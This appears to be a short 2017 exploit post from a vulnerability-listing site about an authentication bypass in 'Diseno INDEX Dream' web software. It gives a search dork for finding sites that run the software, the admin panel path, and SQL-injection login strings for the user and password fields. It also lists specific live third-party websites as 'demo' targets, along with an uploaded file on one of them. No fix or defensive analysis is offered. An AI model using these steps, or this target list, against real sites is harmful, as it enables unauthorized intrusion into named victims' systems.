Diseno INDEX Dream Upload Bypass

Published
Credit
Risk
2017.06.16
MicrosoftInjectorTeam
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"Diseño INDEX Dream"

Vendor:www.indexdream.com
Go To Google Search :intext:"Diseño INDEX Dream"
Enter To The Target
Admin Panel:htm/administrador.php
User: '=' 'or'
Password: '=' 'or'
Demo:
http://www.tramitesuvisa.co/htm/administrador.php
http://www.cootraesturz.com/htm/administrador.php
Upload Image Demo:
http://www.cootraesturz.com/imagenes/home/1.jpg

References:

https://www.youtube.com/channel/UCCJ2YedGaj9UTzMhKDtN8bQ
https://www.facebook.com/hlminjector1


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com